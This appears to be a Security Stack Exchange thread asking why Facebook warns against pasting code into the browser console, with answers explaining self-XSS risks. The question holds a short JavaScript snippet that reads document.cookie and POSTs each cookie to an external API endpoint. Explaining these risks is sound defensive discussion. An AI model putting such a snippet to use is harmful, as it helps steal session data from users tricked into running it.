# Facebook's warning of self-xss

Tags: xss, javascript, cookies, injection, self-xss

I happened to open my browser console on Facebook recently and was greeted with the following message.

> Stop!
>
> This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or "hack" someone's account, it is a scam and will give them access to your Facebook account.
>
> See https://www.facebook.com/selfxss for more information.

My first thought was this was simply over-kill maybe intended to scare away those unsuspecting internet peoples who would blindly copy and paste some javascript into the console in the hopes of unlocking a secret dislike button.

But I've actually been thinking more about how you could compromise a users session data from the Javascript console.

I thought about a script looping over the `document.cookie` variable and posting all the cookie data to an api. Something similar to the below.

```
var cookies = document.cookie.split(';');
var xhr = new XMLHttpRequest();
xhr.open("POST", apiUrl, true);
xhr.setRequestHeader('Content-Type', 'application/json');

for(var i=0 ; i < cookies.length ; ++i) {
    var pair = cookies[i].trim().split('=');
    xhr.send(JSON.stringify({
        name: pair[0],
        value: pair[1]
    }));
}
```

But my understanding is that adding the `http-only` flag to a cookie means it can't be accessed by javascript or client side.

So how could an attacker get you to compromise your facebook account purely by self-xss ?

Answer (score 5, accepted):

The warning is talking about "access to your Facebook account", not complete control.

Self-XSS works like any XSS. While you cannot read the httpOnly session cookie, you can:

- read any data available to the attacked user (messages, secret groups, profile infos, etc)
- send arbitrary requests in the name of the attacked user (send messages, create posts, etc)
- display arbitrary data to the attacked user (fake messages or posts, phishing attackers, etc)

Answer (score 1):

Quoting directly [from Abe Miessler's answer](https://security.stackexchange.com/a/45121/125176):

> "Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user."
>
> I would emphasize the last part of this definition: "...to a different end user."
>
> In my mind, to qualify as a XSS attack you would need to submit a request to a website and have that site respond with the malicious content. The ways this can happen is typically broken down into two different methods:

When you convince your victim to blindly enter text into their browser console, you're basically getting them to directly execute Javascript scripts on their page. This isn't *technically* XSS, but leaving semantics aside, there are other malicious things you could do with full script-execution capabilities to a victim:

- Create a fake login page or [add your own resources](https://stackoverflow.com/a/7376604/4073005) (or overlays).
- Submit posts, execute other actions on their page (like liking posts, submitting pictures, whatever)

As you've already said, setting the http-only flag on a cookie does prevent it from being accessed through the console, but that's not the only attack vector that's available once you have code execution rights.